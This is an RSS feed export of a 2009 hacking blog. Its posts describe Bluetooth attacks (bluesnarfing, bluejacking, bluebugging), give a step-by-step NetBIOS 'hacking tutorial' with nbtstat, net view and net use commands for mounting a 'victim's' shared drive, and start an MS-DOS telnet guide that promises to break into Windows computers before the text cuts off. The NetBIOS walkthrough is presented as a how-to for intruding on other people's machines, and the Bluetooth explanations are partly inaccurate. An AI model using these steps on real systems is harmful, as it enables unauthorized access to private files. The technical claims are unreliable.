'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;a href="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/bluetooth_logo2.png" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;&lt;img class="aligncenter size-medium wp-image-184" title="bluetooth logo" src="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/bluetooth_logo2-300x300.png" alt="bluetooth logo" width="300" height="300" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-style: initial; border-color: initial; margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; border-style: initial; border-color: initial; float: left; padding-top: 5px; padding-right: 5px; padding-bottom: 5px; padding-left: 5px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(223, 226, 228); border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); background-position: initial initial; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Types of hacking-&lt;/strong&gt;&lt;br /&gt;Their are types of blue-tooth hacking –&lt;br /&gt;1.Bluesnarfing&lt;br /&gt;2.Bluejacking&lt;br /&gt;3.Bluebugging&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Bluesnarfing&lt;/strong&gt; is same as&lt;strong&gt; Bluetooth hacking&lt;/strong&gt;. While Bluesnarfing is very much different from bluejacking.&lt;strong&gt;Bluesnarfing&lt;/strong&gt; first introduced by Marcel Holtmann in October 2003. Example is transfer of images.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Bluejacking&lt;/strong&gt; is harmless technology ,the personal information not exposed .In this name field is used to transfer the data.The example for is transfer of business card. &lt;strong&gt;Bluebugging&lt;/strong&gt; was introduced by Martin Herfurt in March 2004.&lt;br /&gt;Example of bluebugging is transfer of  messages.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Problems faced by user&lt;br /&gt;&lt;/strong&gt;1.The hacker can delete or steal the contacts ,personal images etc.&lt;br /&gt;2.The&lt;strong&gt; hacker &lt;/strong&gt;can  make the call orelse use internet at your expenses.&lt;br /&gt;3.The hacker can default to factory setting to your device.&lt;br /&gt;4.The hacker can clone your device so that your messages are also routed to another number. &lt;strong&gt;Cloning&lt;/strong&gt; is also considered as illegal.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Method of hacking&lt;/strong&gt;&lt;br /&gt;The general method  is guessing media access control or &lt;strong&gt;MAC address&lt;/strong&gt; which is at application level that has 48-bit number and is unique among mobile devices .&lt;br /&gt;Some of them are made for &lt;strong&gt;Unix platform&lt;/strong&gt; while others can be used on Java or Symbian compatible cell phone.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;As hacking is illegal then Blue-tooth hacking and Bluesnarfing  are  also illlegal . This arcticle is aware of Blue-tooth technology to the user.&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Bluesnarfing: Type of Bluetooth Hackin</title><link>http://hackingwithme.blogspot.com/2009/04/bluesnarfing-type-of-bluetooth-hackin.html</link><category>Bluetooth Hacking</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 23:02:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-5250540677557305200</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Bluesnarfing &lt;/strong&gt;is one type of &lt;strong&gt;blue-tooth hacking&lt;/strong&gt;. While it &lt;span&gt;&lt;/span&gt;is similar to the &lt;strong&gt;bluejacking and bluebugging&lt;/strong&gt;. It was discovered by Marcel&lt;span&gt; &lt;/span&gt;Holtmann in october 2003.&lt;span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Bluesnarfing&lt;/strong&gt;&lt;span&gt; &lt;/span&gt;is unauthorized access&lt;span&gt; &lt;/span&gt;of&lt;span&gt; &lt;/span&gt;information&lt;span&gt; &lt;/span&gt;or data&lt;span&gt; &lt;/span&gt;from wireless device&lt;span&gt; &lt;/span&gt;through&lt;span&gt; &lt;/span&gt;blue-tooth&lt;span&gt;&lt;/span&gt;technology. Connection is often between the &lt;strong&gt;desktop’s, LAP’s ,cellphones , PDA’s .&lt;/strong&gt; Blue-tooth is very high speed&lt;span&gt; &lt;/span&gt;but a short range wireless technology,in which&lt;span&gt; &lt;/span&gt;exchanging of information between cellphones, deskstop’s. The most&lt;span&gt; &lt;/span&gt;know device in which the blue-tooth is already installed is cellphones .&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;In this the attacker access the calendar, contact list and e-mail and text messages&lt;span&gt; &lt;/span&gt;&lt;span&gt;&lt;/span&gt;without&lt;span&gt; &lt;/span&gt;leaving any evidence of the act. Other device is Laptop’s and computers ,they are having less frequency and more complex system than cellphones . The time&lt;span&gt; &lt;/span&gt;required is attacking this device takes is more.&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;/p&gt;&lt;div id="attachment_197" class="wp-caption aligncenter" style="width: 360px; "&gt;&lt;a href="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/bluesnarfing.jpg" style="color: rgb(172, 6, 4); text-decoration: none; background-color: transparent; "&gt;&lt;img class="size-full wp-image-197" title="bluesnarfing" src="http://www.hackersenigma.com/wp-content/uploads/images/2009/03/bluesnarfing.jpg" alt="Bluesnarfing" width="350" height="200" style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-style: initial; border-color: initial; margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; border-style: initial; border-color: initial; float: left; padding-top: 5px; padding-right: 5px; padding-bottom: 5px; padding-left: 5px; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(223, 226, 228); border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); background-position: initial initial; " /&gt;&lt;/a&gt;&lt;p class="wp-caption-text" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Bluesnarfing&lt;/p&gt;&lt;/div&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;In bluesnarfing&lt;span&gt; &lt;/span&gt;the e&lt;strong&gt;xchange of&lt;span&gt; &lt;/span&gt;Information &lt;/strong&gt;takes place&lt;span&gt; &lt;/span&gt;by guessing the &lt;strong&gt;MAC address.&lt;/strong&gt; &lt;span&gt;&lt;/span&gt;However&lt;span&gt; &lt;/span&gt;this is difficult&lt;span&gt; &lt;/span&gt;task&lt;span&gt; &lt;/span&gt;for&lt;span&gt; &lt;/span&gt;attacker&lt;span&gt; &lt;/span&gt;,the &lt;span&gt;&lt;/span&gt;Bluetooth uses a &lt;span&gt;&lt;/span&gt;48-bit unique MAC Address. There are over 280 trillion &lt;span&gt;&lt;/span&gt;possible addresses to guess .After guessing ,the attacker can synchronize the device which is know as pairing . Then at least the information is exchanged between the devices.&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Bluesnarfing&lt;/strong&gt; is considered as the illegal in many countries.To &lt;strong&gt;avoid bluesnarfing&lt;/strong&gt; always &lt;span&gt;&lt;/span&gt;switch off the blue tooth device to non-discoverable mode . Never pair the device with the unknown or public places.&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>NetBios Hacking For Windows 98/ME/NT/XP Tutorial</title><link>http://hackingwithme.blogspot.com/2009/04/netbios-hacking-for-windows-98mentxp.html</link><category>Remote access</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 22:48:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-1531141913176703600</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Well one of the famous, easy and easy to understand type of hacking is Net Bios. You can play with it as follows.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Disclaimer: We don’t take any responsibility for Illegal use of this tutorial.&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Step 1&lt;/strong&gt;&lt;br /&gt;Get a IP (range) scanner. (superscanner is a fast one, get it here).&lt;br /&gt;Scan the victim’s ip on TCP/IP port 139 (More info about TCP/IP port here)&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Step 2&lt;/strong&gt;&lt;br /&gt;Open a dos prompt&lt;br /&gt;Do this by going to start/run&lt;br /&gt;enter command.com and press ok&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;this is what you see:&lt;br /&gt;c:\windows&gt;&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;This is what you need to type down:&lt;br /&gt;Replace 255.255.255.255 with the victims IP address.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;c:\windows&gt;nbtstat -a 255.255.255.255&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;If you see this your in:&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;NetBIOS  Remote Machine Name  TableName    Type    Status&lt;/strong&gt;&lt;br /&gt;—————————————————————&lt;br /&gt;user&lt;00&gt;                                  UNIQUE                                 Registered&lt;br /&gt;workgroup &lt;00&gt;                       GROUP                                  Registered&lt;br /&gt;user &lt;03&gt;                                 UNIQUE                                 Registered&lt;br /&gt;user  &lt;20&gt;                                UNIQUE                                  Registered&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;MAC Address = xx-xx-xx-xx-xx-xx&lt;/strong&gt;&lt;br /&gt;—————————————————————&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;If you don’t get the number &lt;20&gt;.&lt;br /&gt;The victim disabled the File And Printer Sharing, find a another victim.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;Step 3&lt;/strong&gt;&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;type down:&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;c:\windows&gt;net view \\255.255.255.255&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;if the output is like this:&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Shared resources at \\255.255.255.255&lt;br /&gt;ComputerNameGoesHere&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Sharename Type Used as Comment&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;————————————————————&lt;br /&gt;CDISK Disk xxxxx xxxxx&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;The command completed successfully.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;“DISK” shows that the victim is sharing a Disk named as CDISK&lt;br /&gt;&lt;strong&gt;&lt;br /&gt;Step 4&lt;/strong&gt;&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;type down:&lt;br /&gt;you can replace x: by anything letter yopu want but not your own drive letters.&lt;br /&gt;CDISK is the name of the shared harddrive.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;c:\windows&gt;net use x: \\255.255.255.255\CDISK&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;If the command is successful we will get the confirmation.&lt;br /&gt;The command was completed successfullly&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Now open windows explorer or just double click on the My Computer icon on your&lt;br /&gt;desktop and you will see a new network drive X:\&gt; .&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Hope you have enjoyed this small  hacking tutorial.&lt;/p&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>MS DOS Hacking</title><link>http://hackingwithme.blogspot.com/2009/04/ms-dos-hacking.html</link><category>Remote access</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 21:33:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-6115103312475640885</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;In this Guide you will learn how to:&lt;br /&gt;* Use telnet from Windows&lt;br /&gt;* Download web pages via telnet&lt;br /&gt;* Get finger information via telnet&lt;br /&gt;* Telnet from the DOS command-line&lt;br /&gt;* Use netcat&lt;br /&gt;* Break into Windows Computers from the Internet&lt;br /&gt;Protecting Yourself&lt;br /&gt;What can they do&lt;br /&gt;The command-line approach&lt;br /&gt;The GUI approach&lt;br /&gt;——————————————————————&lt;br /&gt;How to Use Telnet on a Windows Computer&lt;br /&gt;Telnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet.&lt;br /&gt;If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn’t a lot of online help concerning the usage of the program, so my goal is to provide some information for new users.&lt;br /&gt;First off, telnet isn’t so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine.&lt;br /&gt;Now, telnet runs on your Win95 box as a GUI application…that is to say that you can type “telnet” at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled “telnet” will open. This differs from your ftp program in that all commands are entered in the DOS window.&lt;br /&gt;Let’s begin by opening telnet. Simply open a DOS window by clicking “start”, then “programs”, then “MS-DOS”, and at the command prompt, type:&lt;br /&gt;c:\telnet&lt;br /&gt;The window for telnet will open, and you can browse the features of the program from the menu bar.&lt;br /&gt;To learn a bit more about telnet, choose Help -&gt; Contents, or&lt;br /&gt;Help -&gt; Search for help on… from the menu bar. Read through&lt;br /&gt;the files in order to find more detailed explanations of things&lt;br /&gt;you may wish to do. For example, in this explanation, I will&lt;br /&gt;primarily be covering how to use the application and what it can&lt;br /&gt;be used for, but now how to customize the colors for the application.&lt;br /&gt;Now, if you choose Connect -&gt; Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;In the Connect dialog box, you can enter in the host to which&lt;br /&gt;you wish to connect, and there is a list box of several ports&lt;br /&gt;you can connect to:&lt;br /&gt;daytime: May give you the current time on the server.&lt;br /&gt;echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day.&lt;br /&gt;chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program.&lt;br /&gt;telnet: May present you with a login screen.&lt;br /&gt;These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports…you can type in any port number you wish. (For more on fun ports, see the GTMHH, “Port Surf’s Up.”) You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service.&lt;br /&gt;When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt.&lt;br /&gt;[Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.]&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Now, you can also use telnet to connect to other ports, such as&lt;br /&gt;ftp (21), smtp (25), pop3 (110), and even http (80). When you&lt;br /&gt;connect to ftp, smtp, and pop3, you will be presented with a&lt;br /&gt;banner, or a line of text that displays some information about the&lt;br /&gt;service. This will give you a clue as to the operating system&lt;br /&gt;running on the host computer, or it may come right out and tell&lt;br /&gt;you what the operating system is…for instance, AIX, Linux,&lt;br /&gt;Solaris, or NT. If you successfully connect to port 80, you will&lt;br /&gt;see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection.&lt;br /&gt;Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server.&lt;br /&gt;How to Download Web Pages Via Telnet&lt;br /&gt;To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -&gt; Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -&gt; Start Logging… and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the&lt;br /&gt;original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad.&lt;br /&gt;Now, connect the remote host, and if your connection is successful, type in:&lt;br /&gt;GET / HTTP/1.0&lt;br /&gt;and hit enter twice.&lt;br /&gt;You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTML&lt;br /&gt;code for the page, just as though you had chosen the View Source&lt;br /&gt;option from your web browser. You will also get some additional&lt;br /&gt;information…the headers for the file will contain some information&lt;br /&gt;about the server. For example:&lt;br /&gt;HTTP/1.0 200 Document follows&lt;br /&gt;Date: Thu, 04 Jun 1998 14:46:46 GMT&lt;br /&gt;Server: NCSA/1.5.2&lt;br /&gt;Last-modified: Thu, 19 Feb 1998 17:44:13 GMT&lt;br /&gt;Content-type: text/html&lt;br /&gt;Content-length: 3196&lt;br /&gt;One particularly interesting piece of information is the server&lt;br /&gt;name. This refers to the web server software that is running&lt;br /&gt;and serving web pages. You may see other names in this field,&lt;br /&gt;such as versions of Microsoft IIS, Purveyor, WebSite, etc.&lt;br /&gt;This will give you a clue as to the underlying operating system&lt;br /&gt;running on the server.&lt;br /&gt;Getting Finger Information Via Telnet&lt;br /&gt;By now, you’ve probably heard or read a lot about finger. It doesn’t seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn’t ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet?&lt;br /&gt;The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen.&lt;br /&gt;The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don’t know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as “No one logged on.” Or you may get information of all currently logged on users. It all 